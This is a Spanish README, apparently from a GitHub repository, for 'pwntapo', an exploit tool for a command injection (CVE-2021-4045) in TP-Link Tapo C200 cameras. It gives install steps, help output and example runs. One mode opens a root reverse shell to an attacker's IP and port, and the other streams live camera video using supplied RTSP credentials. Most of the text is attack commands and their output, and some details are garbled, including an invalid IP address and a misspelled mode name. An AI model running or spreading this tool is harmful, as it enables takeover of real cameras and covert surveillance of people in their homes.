
🔐 "PWNTAPO: Descubriendo la inyección de comandos en las cámaras TP-Link Tapo C200 (<= v1.1.16 Build 211209)" 🔓
🔐 "PWNTAPO: Revelando Inyección de Comandos en Cámaras TP-Link Tapo C200 (<= v1.1.16 Build 211209)" 🔓
Lee sobre el exploit en exploit db
Se trata de una vulnerabilidad de inyección de comandos que afecta a todas las versiones de firmware de la cámara TP-Link Tapo c200 anteriores a 1.1.16 Build 211209 Rel. 37726N. Para leer más sobre cómo funciona el exploit, consulta este artículo de hacefresko
git clone https://github.com/B3nj4h/CVE-2021-4045.git
cd CVE-2021-4045
pip install -r requirements.txt
python3 pwntapo.py -h
python3 pwntapo.py -h
============================================================================================
@Pl4inT3XT
_______ ________ ___ ___ ___ __ _ _ ___ _ _ _____
/ ____\ \ / / ____| |__ \ / _ \__ \/_ | | || | / _ \| || | | ____|
| | \ \ / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__
| | \ \/ / | __|______/ /| | | |/ / | |______|__ _| | | |__ _|___ \
| |____ \ / | |____ / /_| |_| / /_ | | | | | |_| | | | ___) |
\_____| \/ |______| |____|\___/____||_| |_| \___/ |_| |____/
============================================================================================
usage: pwntapo.py [-h] -M M [-U U] [-P P] [-C C] -H H -A A -p P [-v]
PWNTAPO: Revelando Inyección de Comandos en Cámaras TP-Link Tapo C200 (<= v1.1.16 Build 211209)
options:
-h, --help muestra este mensaje de ayuda y sale
-M M modo de ataque : shell | rtsp (por defecto: None)
-U U RTSP_USER (por defecto: None)
-P P RTSP_PASSWORD (por defecto: None)
-C C RTSP_CIPHERTEXT (por defecto: None)
-H H dirección IP de la víctima (por defecto: None)
-A A dirección IP del atacante (por defecto: None)
-p P puerto de escucha (por defecto: None)
-v aumenta la verbosidad de salida (por defecto: False)
El exploit tiene dos modos: SHELL y RSTP.
En el modo shell solo necesitas proporcionar la IP de la víctima, la IP del atacante y el puerto de escucha, y esto generará un shell root en el dispositivo.
python3 pwntapo.py -M shell -H 192.168.110.121 -A 172.334.121.10 -p 1887
============================================================================================
@Pl4inT3XT
_______ ________ ___ ___ ___ __ _ _ ___ _ _ _____
/ ____\ \ / / ____| |__ \ / _ \__ \/_ | | || | / _ \| || | | ____|
| | \ \ / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__
| | \ \/ / | __|______/ /| | | |/ / | |______|__ _| | | |__ _|___ \
| |____ \ / | |____ / /_| |_| / /_ | | | | | |_| | | | ___) |
\_____| \/ |______| |____|\___/____||_| |_| \___/ |_| |____/
============================================================================================
[+] Escuchando en el puerto 1887...
[+] Enviando shell reversa a 192.168.110.121...
Listening on 0.0.0.0 1887
En el modo RSTP necesitarás proporcionar RSTP_USER, PASSWORD y CIPHERTEXT para poder obtener transmisión en vivo de la cámara.
python3 pwntapo.py -M shelrstp -H 192.168.110.121 -A 192.168.110.131 -p 1887 -U pwneduser -P pwnedpasswd -C RUW5pUYSBm4gt+5T7bzwEq5r078rcdhSvpJrmtqAKE2mRo8bvvOLfYGnr5GNHfANBeFNEHhucnsK86WJTs4xLEZMbxUS73gPMTYRsEBV4EaKt2f5h+BkSbuh0WcJTHl5FWMbwikslj6qwTX48HasSiEmotK+v1N3NLokHCxtU0k=
============================================================================================
@Pl4inT3XT
_______ ________ ___ ___ ___ __ _ _ ___ _ _ _____
/ ____\ \ / / ____| |__ \ / _ \__ \/_ | | || | / _ \| || | | ____|
| | \ \ / /| |__ ______ ) | | | | ) || |______| || |_| | | | || |_| |__
| | \ \/ / | __|______/ /| | | |/ / | |______|__ _| | | |__ _|___ \
| |____ \ / | |____ / /_| |_| / /_ | | | | | |_| | | | ___) |
\_____| \/ |______| |____|\___/____||_| |_| \___/ |_| |____/
============================================================================================
[+] Configurando transmisión de video RTSP...